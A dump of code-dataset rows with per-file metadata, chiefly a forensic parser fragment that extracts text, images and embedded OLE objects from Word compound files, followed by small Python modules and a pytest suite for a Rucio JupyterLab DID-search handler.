if (bFullScanU == False and len(word_document) > fcIndex):
fcSize = len(word_document) - fcIndex - 1
bFullScanU = True
else:
ClxIndex = ClxIndex + 8
continue
while k < fcSize:
pair = word_document[fcIndex + k: fcIndex + k + 2]
# uSpecial must be matched as a one-byte slice: indexing a bytes object
# yields an int, which never compares equal to b'\xF0'.
if pair in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uTrash) or word_document[fcIndex + k + 1:fcIndex + k + 2] == uSpecial:
k += 2
continue
if pair in (uNewline, uNewline2, uNewline3, uNewline4):
if word_document[fcIndex + k] == 0x0d:
string += b'\x0a' # normalize CR to LF
string += bytes([word_document[fcIndex + k + 1]])
else:
string += pair
j = k + 2
while j < fcSize:
nxt = word_document[fcIndex + j: fcIndex + j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uNewline, uNewline2, uNewline3, uNewline4, uTab) or word_document[fcIndex + j + 1:fcIndex + j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= fcSize:
break
elif pair in (uBlank, uBlank2, uTab):
string += pair
j = k + 2
while j < fcSize:
nxt = word_document[fcIndex + j: fcIndex + j + 2]
if nxt in (uSection2, uSection3, uSection4, uSection5, uSection7, uSection8, uBlank, uBlank2, uTab) or word_document[fcIndex + j + 1:fcIndex + j + 2] == uSpecial:
j += 2
continue
k = j
break
if j >= fcSize:
break
string += word_document[fcIndex + k: fcIndex + k + 2]
k += 2
ClxIndex += 8
dictionary = self.__doc_extra_filter__(string, len(string))
filteredText = dictionary['string']
filteredLen = dictionary['length']
# self.compound.content = filteredText.decode("utf-16")
###### DOC: ensure a trailing newline terminator
if len(filteredText) != 0:
nPos = filteredLen
usTmp1 = 0
usTmp2 = 0
if nPos >= 4:
usTmp1 = struct.unpack('<H', filteredText[nPos - 4 : nPos - 2])[0]
usTmp2 = struct.unpack('<H', filteredText[nPos - 2 : nPos])[0]
# usTmp1/usTmp2 are ints, so compare with the numeric code unit 0x000A;
# the old "== uNewline" compared an int to bytes and was always False.
if usTmp1 == 0x000A:
if usTmp2 != 0x000A:
filteredText += b'\x0A\x00\x00\x00'
else:
if usTmp2 == 0x000A:
filteredText += b'\x0A\x00\x00\x00'
else:
filteredText += b'\x0A\x00\x0A\x00\x00\x00'
#######
for i in range(0, len(filteredText), 2):
try:
self.compound.content += filteredText[i:i + 2].decode('utf-16')
except UnicodeDecodeError:
continue
"""
##### Image #####
try:
drawing_offset = 0
img_num = 0
while drawing_offset < len(drawing_data):
if drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset) > 0:
# extension = ".jpg"
drawing_offset = drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset)
# drawing_offset = drawing_data.find(b'\x1D\xF0', drawing_offset)
elif drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset) > 0:
# extension = ".png"
drawing_offset = drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset)
# drawing_offset = drawing_data.find(b'\x1E\xF0', drawing_offset)
else:
break
embedded_blip_rh_ver_instance = \
struct.unpack('<H', drawing_data[drawing_offset: drawing_offset + 2])[0]
embedded_blip_rh_Type = struct.unpack('<H', drawing_data[drawing_offset + 2: drawing_offset + 4])[0]
embedded_blip_rh_recLen = struct.unpack('<I', drawing_data[drawing_offset + 4: drawing_offset + 8])[
0]
drawing_offset += 0x08
embedded_size = embedded_blip_rh_recLen
embedded_blip_rgbUid1 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
embedded_blip_rgbUid2 = None
if int(embedded_blip_rh_ver_instance / 0x10) == 0x46B or int(
embedded_blip_rh_ver_instance / 0x10) == 0x6E3:
embedded_blip_rgbUid2 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
if embedded_blip_rh_Type != 0xF01A and embedded_blip_rh_Type != 0xF01B and embedded_blip_rh_Type != 0xF01C and \
embedded_blip_rh_Type != 0xF01D and embedded_blip_rh_Type != 0xF01E and embedded_blip_rh_Type != 0xF01F and \
embedded_blip_rh_Type != 0xF029:
break
extension = ""
if embedded_blip_rh_Type == 0xF01A:
extension = ".emf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01B:
extension = ".wmf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01C:
extension = ".pict"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01D:
extension = ".jpg"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01E:
extension = ".png"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01F:
extension = ".dib"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF029:
extension = ".tiff"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
if extension == "":
break
embedded_data = drawing_data[drawing_offset: drawing_offset + embedded_size]
drawing_offset += embedded_size
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension)
embedded_fp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension, 'wb')
img_num += 1
embedded_fp.write(embedded_data)
embedded_fp.close()
except Exception:
pass # No Image
### OLE
ole = olefile.OleFileIO(self.compound.filePath)
ole_fp = open(self.compound.filePath, 'rb')
img_num = 0
for i in range(0, len(ole.direntries)):
try:
if ole.direntries[i].name == '\x01Ole10Native': # Multimedia
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
ole_data_offset = 6 # Header
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # Label
data_name = ole_data[6: ole_data_offset].decode('ASCII')
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # OrgPath
ole_data_offset += 8 # UType
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # DataPath
ole_data_offset += 1
data_size = struct.unpack('<I', ole_data[ole_data_offset: ole_data_offset + 4])[0]
ole_data_offset += 4
data = ole_data[ole_data_offset: ole_data_offset + data_size]
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + data_name)
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + data_name, 'wb')
temp.write(data)
temp.close()
elif ole.direntries[i].name == 'Package': # embedded OOXML handling
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if ole_data.find(b'\x78\x6C\x2F\x77\x6F\x72\x6B\x62\x6F\x6F\x6B\x2E\x78\x6D\x6C') > 0: # XLSX
extension = ".xlsx"
elif ole_data.find(
b'\x77\x6F\x72\x64\x2F\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x78\x6D\x6C') > 0: # DOCX
extension = ".docx"
elif ole_data.find(
b'\x70\x70\x74\x2F\x70\x72\x65\x73\x65\x6E\x74\x61\x74\x69\x6F\x6E\x2E\x78\x6D\x6C') > 0: # PPTX
extension = ".pptx"
else:
extension = ".zip"
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension)
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension, 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name == 'CONTENTS': # PDF
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".pdf")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".pdf", 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name[0:1] == '_' and len(ole.direntries[i].name) == 11:
self.compound.has_ole = True
word_document = None
table = None
powerpoint_document = None
current_user = None
workbook = None
section_data = ""
for j in range(0, len(ole.direntries[i].kids)):
if ole.direntries[i].kids[j].name == "WordDocument":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
word_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "1Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "0Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "PowerPoint Document":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
powerpoint_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "Current User":
idx = ole.root.isectStart
chain = [idx]
while True:
idx = ole.fat[idx]
if idx == 4294967294:
break
chain.append(idx)
out = bytearray(b'')
for idx in chain:
pos = (idx + 1) * 512
ole_fp.seek(pos)
d = ole_fp.read(512)
out += d
current_user = out[64 * (ole.direntries[i].kids[j].isectStart):64 * (
ole.direntries[i].kids[j].isectStart) + ole.direntries[i].kids[j].size]
elif ole.direntries[i].kids[j].name == "Workbook":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
workbook = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "BodyText":
section_data = ""
for k in range(0, len(ole.direntries[i].kids[j].kids)):
ole_fp.seek((ole.direntries[i].kids[j].kids[k].isectStart + 1) * 0x200)
temp_section_data = ole_fp.read(ole.direntries[i].kids[j].kids[k].size)
if temp_section_data[0:2] == b'\x42\x00':
is_compressed = False
else:
is_compressed = True
msg = self.inflateBodytext(temp_section_data, is_compressed)
if msg is not False:
section_data += msg
# DOC
result = None
if word_document != None and table != None:
result = self.__parse_doc_normal_for_ole__(word_document, table)
if result != None:
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# XLS
from carpe_xls import XLS
from carpe_compound import Compound
result = None
if workbook != None:
temp_xls = XLS(Compound(self.compound.filePath))
result = temp_xls.__parse_xls_normal_for_ole__(workbook)
if result != None:
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# PPT
from carpe_ppt import PPT
from carpe_compound import Compound
result = None
if powerpoint_document != None and current_user != None:
temp_ppt = PPT(Compound(self.compound.filePath))
result = temp_ppt.__parse_ppt_normal_for_ole__(powerpoint_document, current_user)
if result != None:
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# HWP
if section_data != "":
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(section_data)
temp.close()
img_num += 1
except Exception:
continue
data = len(ole.direntries)
# print(data)
ole_fp.close()"""
| 51.173583
| 227
| 0.420089
| 9,483
| 101,119
| 4.359696
| 0.047981
| 0.056019
| 0.07445
| 0.05181
| 0.919333
| 0.90499
| 0.898145
| 0.89113
| 0.883366
| 0.882229
| 0
| 0.072754
| 0.483747
| 101,119
| 1,975
| 228
| 51.199494
| 0.719212
| 0.03305
| 0
| 0.787856
| 0
| 0.018741
| 0.052811
| 0.033851
| 0
| 0
| 0.007289
| 0
| 0
| 1
| 0.006747
| false
| 0.002999
| 0.007496
| 0
| 0.032984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4730abf8bfc42951b3a8d94a4d6afd2a642f972
| 103
|
py
|
Python
|
washing_learning/loggers/__init__.py
|
Lucas-rbnt/washing-learning
|
eb3e8bcc7c58dafc19bfb94779c681c1164524e7
|
[
"MIT"
] | 8
|
2021-04-13T09:12:38.000Z
|
2021-11-02T08:50:29.000Z
|
washing_learning/loggers/__init__.py
|
Lucas-rbnt/washing-learning
|
eb3e8bcc7c58dafc19bfb94779c681c1164524e7
|
[
"MIT"
] | null | null | null |
washing_learning/loggers/__init__.py
|
Lucas-rbnt/washing-learning
|
eb3e8bcc7c58dafc19bfb94779c681c1164524e7
|
[
"MIT"
] | null | null | null |
from washing_learning.loggers.tensorboard import *
from washing_learning.loggers.time_loggers import *
| 34.333333
| 51
| 0.864078
| 13
| 103
| 6.615385
| 0.538462
| 0.255814
| 0.44186
| 0.604651
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 103
| 2
| 52
| 51.5
| 0.905263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f47e41cce7a998e15bb79abbd5228fe5aae85297
| 175
|
py
|
Python
|
tests/parser/aggregates.count.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(1).
a(2).
a(3).
p(1,3).
p(2,4).
:- p(M, N), #count{V : a(V)} > N.
"""
output = """
a(1).
a(2).
a(3).
p(1,3).
p(2,4).
:- p(M, N), #count{V : a(V)} > N.
"""
| 8.333333
| 33
| 0.337143
| 42
| 175
| 1.404762
| 0.285714
| 0.135593
| 0.101695
| 0.135593
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0
| 0.103704
| 0.228571
| 175
| 20
| 34
| 8.75
| 0.333333
| 0
| 0
| 0.875
| 0
| 0
| 0.822857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
be427b015891ff35bb7e030ede9766a3eed8d167
| 178
|
py
|
Python
|
adsilib/__main__.py
|
atsiaras/adsilib
|
0408baab937812bb0862f6186ad936806fe670a4
|
[
"MIT"
] | null | null | null |
adsilib/__main__.py
|
atsiaras/adsilib
|
0408baab937812bb0862f6186ad936806fe670a4
|
[
"MIT"
] | null | null | null |
adsilib/__main__.py
|
atsiaras/adsilib
|
0408baab937812bb0862f6186ad936806fe670a4
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
if __name__ == '__main__':
import adsilib
adsilib.run_app()
| 22.25
| 38
| 0.797753
| 22
| 178
| 5.409091
| 0.590909
| 0.252101
| 0.403361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157303
| 178
| 7
| 39
| 25.428571
| 0.793333
| 0
| 0
| 0
| 0
| 0
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be75d6cd1c716da4e1cc50ad6064cc6708de5777
| 271
|
py
|
Python
|
pytorchrl/envs/__init__.py
|
PyTorchRL/pytorchrl
|
055843ab58a06ba1f77da73082be6f23cf453ddd
|
[
"MIT"
] | 20
|
2021-01-12T16:31:34.000Z
|
2022-03-18T00:31:29.000Z
|
pytorchrl/envs/__init__.py
|
PyTorchRL/pytorchrl
|
055843ab58a06ba1f77da73082be6f23cf453ddd
|
[
"MIT"
] | 4
|
2021-01-19T09:29:58.000Z
|
2021-09-29T12:21:08.000Z
|
pytorchrl/envs/__init__.py
|
PyTorchRL/pytorchrl
|
055843ab58a06ba1f77da73082be6f23cf453ddd
|
[
"MIT"
] | 2
|
2021-01-12T16:07:37.000Z
|
2021-02-01T21:09:14.000Z
|
from .atari.atari_env_factory import atari_train_env_factory, atari_test_env_factory
from .mujoco.mujoco_env_factory import mujoco_train_env_factory, mujoco_test_env_factory
from .pybullet.pybullet_env_factory import pybullet_train_env_factory, pybullet_test_env_factory
| 67.75
| 96
| 0.911439
| 42
| 271
| 5.309524
| 0.214286
| 0.403587
| 0.215247
| 0.161435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055351
| 271
| 3
| 97
| 90.333333
| 0.871094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
beb136d7cb0edafe9fdcd576bb1364df17d431ad
| 7,108
|
py
|
Python
|
rucio_jupyterlab/tests/test_handler_did_search.py
|
didithilmy/jupyterlab-extension
|
3268dccda0a282d96b4411d267a851535a900eca
|
[
"Apache-2.0"
] | 3
|
2021-01-22T08:08:37.000Z
|
2022-02-03T09:44:21.000Z
|
rucio_jupyterlab/tests/test_handler_did_search.py
|
didithilmy/jupyterlab-extension
|
3268dccda0a282d96b4411d267a851535a900eca
|
[
"Apache-2.0"
] | 4
|
2021-02-23T16:17:17.000Z
|
2021-05-07T05:54:45.000Z
|
rucio_jupyterlab/tests/test_handler_did_search.py
|
didithilmy/jupyterlab-extension
|
3268dccda0a282d96b4411d267a851535a900eca
|
[
"Apache-2.0"
] | 2
|
2021-01-22T08:08:44.000Z
|
2021-02-24T09:46:24.000Z
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Muhammad Aditya Hilmy, <mhilmy@hey.com>, 2020
import json
from unittest.mock import call
import pytest
from rucio_jupyterlab.handlers.did_search import DIDSearchHandler, DIDSearchHandlerImpl, WildcardDisallowedException
from rucio_jupyterlab.rucio import RucioAPIFactory
from .mocks.mock_handler import MockHandler
MOCK_ACTIVE_INSTANCE = 'atlas'
def test_search_did__with_wildcard__wildcard_enabled__should_return_correct_response(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = True
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
result = handler.search_did('scope', 'name*', 'all', 100)
rucio.search_did.assert_called_once_with('scope', 'name*', 'all', 100)
expected = [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
assert result == expected, "Invalid return value"
def test_search_did__without_wildcard__wildcard_disabled__should_return_correct_response(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = False
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
result = handler.search_did('scope', 'name', 'all', 100)
rucio.search_did.assert_called_once_with('scope', 'name', 'all', 100)
expected = [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
assert result == expected, "Invalid return value"
def test_search_did__with_wildcard__wildcard_disabled__should_raise_exception(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = False
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
with pytest.raises(WildcardDisallowedException):
handler.search_did('scope', 'name*', 'all', 100)
rucio.search_did.assert_not_called()  # the wildcard check raises before Rucio is queried
def test_search_did__with_percent_wildcard__wildcard_disabled__should_raise_exception(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = False
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
with pytest.raises(WildcardDisallowedException):
handler.search_did('scope', 'name%', 'all', 100)
rucio.search_did.assert_not_called()  # the wildcard check raises before Rucio is queried
def test_get_handler__inputs_correct__should_not_error(mocker, rucio):
mock_self = MockHandler()
def mock_get_query_argument(key, default=None):
args = {
'namespace': MOCK_ACTIVE_INSTANCE,
'type': 'all',
'did': 'scope:name'
}
return args.get(key, default)
mocker.patch.object(mock_self, 'get_query_argument', side_effect=mock_get_query_argument)
class MockDIDSearchHandler(DIDSearchHandlerImpl):
@staticmethod
def search_did(scope, name, search_type='all', limit=100):
return [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
mocker.patch('rucio_jupyterlab.handlers.did_search.DIDSearchHandlerImpl', MockDIDSearchHandler)
def finish_side_effect(output):
finish_json = json.loads(output)
expected = [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
assert finish_json == expected, "Invalid finish response"
mocker.patch.object(mock_self, 'finish', side_effect=finish_side_effect)
rucio_api_factory = RucioAPIFactory(None)
mocker.patch.object(rucio_api_factory, 'for_instance', return_value=rucio)
mock_self.rucio = rucio_api_factory
DIDSearchHandler.get(mock_self)
calls = [call('did'), call('namespace'), call('type', 'collection')]
mock_self.get_query_argument.assert_has_calls(calls, any_order=True) # pylint: disable=no-member
def test_get_handler__wildcard_disabled__should_print_error(mocker, rucio):
mock_self = MockHandler()
def mock_get_query_argument(key, default=None):
args = {
'namespace': MOCK_ACTIVE_INSTANCE,
'type': 'all',
'did': 'scope:name'
}
return args.get(key, default)
mocker.patch.object(mock_self, 'get_query_argument', side_effect=mock_get_query_argument) # pylint: disable=no-member
class MockDIDSearchHandler(DIDSearchHandlerImpl):
@staticmethod
def search_did(scope, name, search_type='all', limit=100):
raise WildcardDisallowedException()
mocker.patch('rucio_jupyterlab.handlers.did_search.DIDSearchHandlerImpl', MockDIDSearchHandler)
def finish_side_effect(output):
finish_json = json.loads(output)
expected = {'error': 'wildcard_disabled'}
assert finish_json == expected, "Invalid finish response"
mocker.patch.object(mock_self, 'set_status', return_value=None)
mocker.patch.object(mock_self, 'finish', side_effect=finish_side_effect)
rucio_api_factory = RucioAPIFactory(None)
mocker.patch.object(rucio_api_factory, 'for_instance', return_value=rucio)
mock_self.rucio = rucio_api_factory
DIDSearchHandler.get(mock_self)
mock_self.set_status.assert_called_with(400) # pylint: disable=no-member
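The assertions above pin down the handler's full contract: wildcard gating, result mapping, and the error path. Below is a minimal sketch of an implementation that would satisfy them; the body is inferred from the tests, not taken from the actual rucio-jupyterlab extension.
# Hypothetical sketch inferred from the tests above; not the real implementation.
class WildcardDisallowedException(Exception):
    pass


class DIDSearchHandlerImpl:
    def __init__(self, namespace, rucio):
        self.namespace = namespace
        self.rucio = rucio

    def search_did(self, scope, name, search_type='all', limit=100):
        wildcard_enabled = self.rucio.instance_config.get('wildcard_enabled', False)
        if ('*' in name or '%' in name) and not wildcard_enabled:
            raise WildcardDisallowedException()
        dids = self.rucio.search_did(scope, name, search_type, limit)
        # Map Rucio DID records to the response shape the tests assert.
        return [
            {'did': "%s:%s" % (d['scope'], d['name']),
             'size': d['bytes'],
             'type': d['did_type'].lower()}
            for d in dids
        ]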
| 39.709497
| 122
| 0.669387
| 826
| 7,108
| 5.5
| 0.168281
| 0.047546
| 0.03698
| 0.028175
| 0.809817
| 0.794629
| 0.794629
| 0.785824
| 0.785824
| 0.785824
| 0
| 0.015297
| 0.181486
| 7,108
| 178
| 123
| 39.932584
| 0.765555
| 0.057119
| 0
| 0.735537
| 0
| 0
| 0.210912
| 0.01704
| 0
| 0
| 0
| 0
| 0.082645
| 1
| 0.099174
| false
| 0
| 0.049587
| 0.008264
| 0.190083
| 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe275cf48d39879d1086dc86394e426b9e12f80d
| 95
|
py
|
Python
|
src/models/log_reg.py
|
GavinNishizawa/ncaa-march-madness-2018
|
8324e48ba32c685d60a4eb97e0f10f664a88710b
|
[
"MIT"
] | 1
|
2018-03-08T23:44:18.000Z
|
2018-03-08T23:44:18.000Z
|
src/models/log_reg.py
|
